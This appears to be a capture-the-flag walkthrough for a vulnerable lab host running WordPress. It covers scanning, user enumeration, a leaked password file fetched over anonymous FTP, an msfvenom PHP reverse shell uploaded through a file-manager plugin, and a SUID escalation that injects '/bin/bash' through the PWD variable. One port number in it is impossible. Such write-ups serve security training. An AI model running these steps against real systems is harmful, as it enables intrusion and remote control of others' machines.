Scan the host with nmap : nmap –A –T4 –p- 192.168.1.9 –vv
As we visit the host ip, it’s running wordpress service
Lets run wpscan to enumerate users names
Wpscan –url http://192.168.1.9 –e u
Now we can confirm that we have the user admin
we can see from nmap scan that ftp service is open and its using anonymous login and there is a file called backupPasswords
We logged in using ftp 192.168.1.9 and then the username anonymous, listing the directory we can see the file backupPasswords, now we download it using the command get
Trying to brute force the ssh and the ftp services with the username Doe and the file with the passwords didn’t work.
Using dirb on the host came with results but no so useful, but trying it with port 655635 came with good results, path /phpcms.
The page is for a user named John and not Don, so lets wpscan it and see what we can find.
Two usernames maybeadmin – notadmin, I tried the first username against the backupPassword file and I got a login using the password $EPid%J2L9LufO5
I went straight to the Secure Post and viewing it we can see the other username and the password.
Now lets login using the new username and password, after that we can upload a shell using the plugins, search for file manager in the plugins and install it, open it and upload a php shell using msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=443 -f raw > shell.php
Just right click on the shell and view it while metasploit is running using a multi/handler and we will get a shell.
Now lets do some privilege escalation on the host.
The itseasy file is SUID binary file we can manipulate with “ export PWD=’;/bin/bash’ “ and then run it to get into John privilege shell.
Going to John’s home directory there is a folder .local where inside it more folders and finally a text file with some information looks to be a 64code, encoding it we got a password to login to ssh service.
Ok now we need to create file named test.html in the path var/www/html, but when trying to create it with John it gave us permission denied, so I went back to Doe and created the file and gave it permission then went to John in ssh session and ran it again.